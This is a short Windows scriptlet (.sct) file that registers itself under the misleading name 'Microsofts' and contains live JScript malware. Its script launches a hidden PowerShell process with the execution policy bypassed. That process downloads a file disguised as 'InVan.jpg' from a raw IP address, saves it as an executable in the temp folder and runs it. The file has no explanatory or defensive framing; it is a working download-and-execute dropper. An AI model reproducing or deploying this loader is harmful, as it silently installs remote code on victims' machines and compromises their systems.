<?XML version="1.0"?>
<scriptlet>

<registration
    description="Microsofts"
    progid="Microsofts"
    version="1.00"
    classid="{90AA3A4E-6764-44B7-A1B9-55F57183CDB0}"
    remotable="true"
	>
</registration>

<script language="JScript">
<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("powershell -ExecutionPolicy Bypass -nop -w hidden -c (new-object System.Net.WebClient).DownloadFile(\'http://111.229.92.71:20/InVan.jpg\',\'%temp%\\InVan.exe\');start-process \'%temp%\\InVan.exe\';", 0, true);
]]>
</script>

</scriptlet>
